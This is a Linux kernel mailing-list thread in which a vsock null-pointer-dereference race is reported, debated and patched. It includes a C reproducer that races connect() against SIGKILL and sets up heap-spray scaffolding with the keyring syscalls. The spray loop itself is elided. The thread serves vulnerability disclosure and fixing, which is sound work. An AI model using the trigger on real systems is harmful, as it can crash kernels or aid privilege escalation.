On Wed, Dec 18, 2024 at 04:31:03PM +0100, Stefano Garzarella wrote: > On Wed, Dec 18, 2024 at 03:40:40PM +0100, Stefano Garzarella wrote: > > On Wed, Dec 18, 2024 at 09:19:08AM -0500, Hyunwoo Kim wrote: > > > On Wed, Dec 18, 2024 at 02:40:49PM +0100, Stefano Garzarella wrote: > > > > On Wed, Dec 18, 2024 at 07:25:07AM -0500, Hyunwoo Kim wrote: > > > > > When calling connect to change the CID of a vsock, the loopback > > > > > worker for the VIRTIO_VSOCK_OP_RST command is invoked. > > > > > During this process, vsock_stream_has_data() calls > > > > > vsk->transport->stream_has_data(). > > > > > However, a null-ptr-deref occurs because vsk->transport was set > > > > > to NULL in vsock_deassign_transport(). > > > > > > > > > > cpu0 cpu1 > > > > > > > > > > socket(A) > > > > > > > > > > bind(A, VMADDR_CID_LOCAL) > > > > > vsock_bind() > > > > > > > > > > listen(A) > > > > > vsock_listen() > > > > > socket(B) > > > > > > > > > > connect(B, VMADDR_CID_LOCAL) > > > > > > > > > > connect(B, VMADDR_CID_HYPERVISOR) > > > > > vsock_connect(B) > > > > > lock_sock(sk); > > It shouldn't go on here anyway, because there's this check in > vsock_connect(): > > switch (sock->state) { > case SS_CONNECTED: > err = -EISCONN; > goto out; By using a kill signal, set sock->state to SS_UNCONNECTED and sk->sk_state to TCP_CLOSING before the second connect() is called, causing the worker to execute without the SOCK_DONE flag being set. > > > Indeed if I try, I have this behaviour: > > shell1# python3 > import socket > s = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) > s.bind((1,1234)) > s.listen() > > shell2# python3 > import socket > s = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) > s.connect((1, 1234)) > s.connect((2, 1234)) > Traceback (most recent call last): > File "<stdin>", line 1, in <module> > OSError: [Errno 106] Transport endpoint is already connected > > > Where 106 is exactly EISCONN. > So, do you have a better reproducer for that? The full scenario is as follows: ``` cpu0 cpu1 socket(A) bind(A, {cid: VMADDR_CID_LOCAL, port: 1024}) vsock_bind() listen(A) vsock_listen() socket(B) connect(B, {cid: VMADDR_CID_LOCAL, port: 1024}) vsock_connect() lock_sock(sk); virtio_transport_connect() virtio_transport_connect() virtio_transport_send_pkt_info() vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_REQUEST) queue_work(vsock_loopback_work) sk->sk_state = TCP_SYN_SENT; release_sock(sk); vsock_loopback_work() virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_REQUEST) sk = vsock_find_bound_socket(&dst); virtio_transport_recv_listen(sk, skb) child = vsock_create_connected(sk); vsock_assign_transport() vvs = kzalloc(sizeof(*vvs), GFP_KERNEL); vsock_insert_connected(vchild); list_add(&vsk->connected_table, list); virtio_transport_send_response(vchild, skb); virtio_transport_send_pkt_info() vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_RESPONSE) queue_work(vsock_loopback_work) vsock_loopback_work() virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_RESPONSE) sk = vsock_find_bound_socket(&dst); lock_sock(sk); case TCP_SYN_SENT: virtio_transport_recv_connecting() sk->sk_state = TCP_ESTABLISHED; release_sock(sk); kill(connect(B)); lock_sock(sk); if (signal_pending(current)) { sk->sk_state = sk->sk_state == TCP_ESTABLISHED ? TCP_CLOSING : TCP_CLOSE; sock->state = SS_UNCONNECTED; release_sock(sk); connect(B, {cid: VMADDR_CID_HYPERVISOR, port: 1024}) vsock_connect(B) lock_sock(sk); vsock_assign_transport() virtio_transport_release() virtio_transport_close() if (!(sk->sk_state == TCP_ESTABLISHED || sk->sk_state == TCP_CLOSING)) virtio_transport_shutdown() virtio_transport_send_pkt_info() vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_SHUTDOWN) queue_work(vsock_loopback_work) vsock_deassign_transport() vsk->transport = NULL; return -ESOCKTNOSUPPORT; release_sock(sk); vsock_loopback_work() virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_SHUTDOWN) virtio_transport_recv_connected() virtio_transport_reset() virtio_transport_send_pkt_info() vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_RST) queue_work(vsock_loopback_work) vsock_loopback_work() virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_RST) virtio_transport_recv_disconnecting() virtio_transport_do_close() vsock_stream_has_data() vsk->transport->stream_has_data(vsk); // null-ptr-deref ``` And the reproducer I used is as follows, but since it’s a race condition, triggering it might take a long time depending on the environment. Therefore, it’s a good idea to add an mdelay to the appropriate vsock function: ``` #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <linux/vm_sockets.h> #include <unistd.h> #include <pthread.h> #include <fcntl.h> #include <syscall.h> #include <stdarg.h> #include <sched.h> #include <signal.h> #include <time.h> #include <errno.h> #include <string.h> #include <sys/mman.h> #include <sys/times.h> #include <sys/timerfd.h> #include <sys/wait.h> #include <sys/socket.h> #include <stddef.h> #include <linux/types.h> #include <stdint.h> #include <linux/keyctl.h> #include <stdio.h> #include <stdlib.h> #include <syscall.h> #include <stdarg.h> #include <sched.h> #include <signal.h> #include <time.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <string.h> #include <sys/mman.h> #include <sys/times.h> #include <sys/timerfd.h> #include <sys/wait.h> #include <sys/socket.h> #include <stddef.h> #define FAIL_IF(x) if ((x)) { \ perror(#x); \ return -1; \ } #define SPRAY_ERROR 0 #define SPRAY_RETRY 1 #define SPRAY_SUCCESS 2 #define LAST_RESERVED_PORT 1023 #define NS_PER_JIFFIE 1000000ull int cid_port_num = LAST_RESERVED_PORT; void *trigger_stack = NULL; void *heap_spray_stack = NULL; volatile int status_spray = SPRAY_ERROR; struct virtio_vsock_sock { void *vsk; int tx_lock; int rx_lock; int tx_cnt; int peer_fwd_cnt; int peer_buf_alloc; int fwd_cnt; int last_fwd_cnt; int rx_bytes; int buf_alloc; char pad[4]; char rx_queue[24]; int msg_count; }; _Static_assert(sizeof(struct virtio_vsock_sock) == 80, "virtio_vsock_sock size missmatch"); union key_payload { struct virtio_vsock_sock vvs; struct { char header[24]; char data[]; } key; }; #define MAIN_CPU 0 #define HELPER_CPU 1 inline static int _pin_to_cpu(int id) { cpu_set_t set; CPU_ZERO(&set); CPU_SET(id, &set); return sched_setaffinity(getpid(), sizeof(set), &set); } typedef int key_serial_t; inline static key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid) { return syscall(__NR_add_key, type, description, payload, plen, ringid); } long keyctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) { return syscall(__NR_keyctl, option, arg2, arg3, arg4, arg5); } unsigned long long get_jiffies() { return times(NULL) * 10; } int race_trigger(void *arg) { struct sockaddr_vm connect_addr = {0}; struct sockaddr_vm listen_addr = {0}; pid_t conn_pid, listen_pid; int socket_a = socket(AF_VSOCK, SOCK_SEQPACKET, 0); int socket_b = socket(AF_VSOCK, SOCK_SEQPACKET, 0); cid_port_num++; connect_addr.svm_family = AF_VSOCK; connect_addr.svm_cid = VMADDR_CID_LOCAL; connect_addr.svm_port = cid_port_num; listen_addr.svm_family = AF_VSOCK; listen_addr.svm_cid = VMADDR_CID_LOCAL; listen_addr.svm_port = cid_port_num; bind(socket_a, (struct sockaddr *)&listen_addr, sizeof(listen_addr)); listen(socket_a, 0); _pin_to_cpu(MAIN_CPU); conn_pid = fork(); if (conn_pid == 0) { /* struct itimerspec it = {}; int tfd; FAIL_IF((tfd = timerfd_create(CLOCK_MONOTONIC, 0)) < 0); unsigned long tmp; it.it_value.tv_sec = 0; it.it_value.tv_nsec = 1 * NS_PER_JIFFIE; FAIL_IF(timerfd_settime(tfd, 0, &it, NULL) < 0); read(tfd, &tmp, sizeof(tmp)); */ connect(socket_b, (struct sockaddr *)&connect_addr, sizeof(connect_addr)); } else { /* struct itimerspec it = {}; int tfd; FAIL_IF((tfd = timerfd_create(CLOCK_MONOTONIC, 0)) < 0); unsigned long tmp; it.it_value.tv_sec = 0; it.it_value.tv_nsec = 1 * NS_PER_JIFFIE; FAIL_IF(timerfd_settime(tfd, 0, &it, NULL) < 0); read(tfd, &tmp, sizeof(tmp)); */ kill(conn_pid, SIGKILL); wait(NULL); } connect_addr.svm_cid = 0; connect(socket_b, (struct sockaddr *)&connect_addr, sizeof(connect_addr)); return 0; } int heap_spraying(void *arg) { union key_payload payload = {}; union key_payload readout = {}; key_serial_t keys[256] = {}; status_spray = SPRAY_ERROR; int race_trigger_pid = clone(race_trigger, trigger_stack, CLONE_VM | SIGCHLD, NULL); FAIL_IF(race_trigger_pid < 0); const size_t payload_size = sizeof(payload.vvs) - sizeof(payload.key.header); memset(&payload, '?', sizeof(payload)); _pin_to_cpu(MAIN_CPU); unsigned long long begin = get_jiffies(); do { // ... } while (get_jiffies() - begin < 25); status_spray = SPRAY_RETRY; return 0; } int main() { srand(time(NULL)); trigger_stack = mmap(NULL, 0x8000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); FAIL_IF(trigger_stack == MAP_FAILED); trigger_stack += 0x8000; heap_spray_stack = mmap(NULL, 0x8000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); FAIL_IF(heap_spray_stack == MAP_FAILED); heap_spray_stack += 0x8000; do { int spray_worker_pid = clone(heap_spraying, heap_spray_stack, CLONE_VM | SIGCHLD, NULL); FAIL_IF(spray_worker_pid < 0); FAIL_IF(waitpid(spray_worker_pid, NULL, 0) < 0); } while (status_spray == SPRAY_RETRY); return 0; } ``` > > Would be nice to add a test in tools/testing/vsock/vsock_test.c > > Thanks, > Stefano > > > > > > vsock_assign_transport() > > > > > virtio_transport_release() > > > > > virtio_transport_close() > > > > > virtio_transport_shutdown() > > > > > virtio_transport_send_pkt_info() > > > > > vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_SHUTDOWN) > > > > > queue_work(vsock_loopback_work) > > > > > vsock_deassign_transport() > > > > > vsk->transport = NULL; > > > > > vsock_loopback_work() > > > > > virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_SHUTDOWN) > > > > > virtio_transport_recv_connected() > > > > > virtio_transport_reset() > > > > > virtio_transport_send_pkt_info() > > > > > vsock_loopback_send_pkt(VIRTIO_VSOCK_OP_RST) > > > > > queue_work(vsock_loopback_work) > > > > > > > > > > vsock_loopback_work() > > > > > virtio_transport_recv_pkt(VIRTIO_VSOCK_OP_RST) > > > > > virtio_transport_recv_disconnecting() > > > > > virtio_transport_do_close() > > > > > vsock_stream_has_data() > > > > > vsk->transport->stream_has_data(vsk); // null-ptr-deref > > > > > > > > > > To resolve this issue, add a check for vsk->transport, similar to > > > > > functions like vsock_send_shutdown(). > > > > > > > > > > Fixes: fe502c4a38d9 ("vsock: add 'transport' member in the struct vsock_sock") > > > > > Signed-off-by: Hyunwoo Kim <v4bel@xxxxxxxxx> > > > > > Signed-off-by: Wongi Lee <qwerty@xxxxxxxxx> > > > > > --- > > > > > net/vmw_vsock/af_vsock.c | 3 +++ > > > > > 1 file changed, 3 insertions(+) > > > > > > > > > > diff --git a/net/vmw_vsock/af_vsock.c b/net/vmw_vsock/af_vsock.c > > > > > index 5cf8109f672a..a0c008626798 100644 > > > > > --- a/net/vmw_vsock/af_vsock.c > > > > > +++ b/net/vmw_vsock/af_vsock.c > > > > > @@ -870,6 +870,9 @@ EXPORT_SYMBOL_GPL(vsock_create_connected); > > > > > > > > > > s64 vsock_stream_has_data(struct vsock_sock *vsk) > > > > > { > > > > > + if (!vsk->transport) > > > > > + return 0; > > > > > + > > > > > > > > I understand that this alleviates the problem, but IMO it is not the right > > > > solution. We should understand why we're still processing the packet in the > > > > context of this socket if it's no longer assigned to the right transport. > > > > > > Got it. I agree with you. > > > > > > > > > > > Maybe we can try to improve virtio_transport_recv_pkt() and check if the > > > > vsk->transport is what we expect, I mean something like this (untested): > > > > > > > > diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c > > > > index 9acc13ab3f82..18b91149a62e 100644 > > > > --- a/net/vmw_vsock/virtio_transport_common.c > > > > +++ b/net/vmw_vsock/virtio_transport_common.c > > > > @@ -1628,8 +1628,10 @@ void virtio_transport_recv_pkt(struct virtio_transport *t, > > > > > > > > lock_sock(sk); > > > > > > > > - /* Check if sk has been closed before lock_sock */ > > > > - if (sock_flag(sk, SOCK_DONE)) { > > > > + /* Check if sk has been closed or assigned to another transport before > > > > + * lock_sock > > > > + */ > > > > + if (sock_flag(sk, SOCK_DONE) || vsk->transport != t) { > > > > (void)virtio_transport_reset_no_sock(t, skb); > > > > release_sock(sk); > > > > sock_put(sk); > > > > > > > > BTW I'm not sure it is the best solution, we have to check that we do not > > > > introduce strange cases, but IMHO we have to solve the problem earlier in > > > > virtio_transport_recv_pkt(). > > > > > > At least for vsock_loopback.c, this change doesn’t seem to introduce any > > > particular issues. > > > > But was it working for you? because the check was wrong, this one should > > work, but still, I didn't have time to test it properly, I'll do later. > > > > diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c > > index 9acc13ab3f82..ddecf6e430d6 100644 > > --- a/net/vmw_vsock/virtio_transport_common.c > > +++ b/net/vmw_vsock/virtio_transport_common.c > > @@ -1628,8 +1628,10 @@ void virtio_transport_recv_pkt(struct virtio_transport *t, > > lock_sock(sk); > > - /* Check if sk has been closed before lock_sock */ > > - if (sock_flag(sk, SOCK_DONE)) { > > + /* Check if sk has been closed or assigned to another transport before > > + * lock_sock > > + */ > > + if (sock_flag(sk, SOCK_DONE) || vsk->transport != &t->transport) { > > (void)virtio_transport_reset_no_sock(t, skb); > > release_sock(sk); > > sock_put(sk); > > > > > > > > And separately, I think applying the vsock_stream_has_data patch would help > > > prevent potential issues that could arise when vsock_stream_has_data is > > > called somewhere. > > > > Not sure, with that check, we wouldn't have seen this problem we had, so > > either add an error, but mute it like this I don't think is a good idea, > > also because the same function is used in a hot path, so an extra check > > could affect performance (not much honestly in this case, but adding it > > anywhere could). > > > > Thanks, > > Stefano > > > > > > > > > > > > > Thanks, > > > > Stefano > > > > > > > > > return vsk->transport->stream_has_data(vsk); > > > > > } > > > > > EXPORT_SYMBOL_GPL(vsock_stream_has_data); > > > > > -- > > > > > 2.34.1 > > > > > > > > > > > > >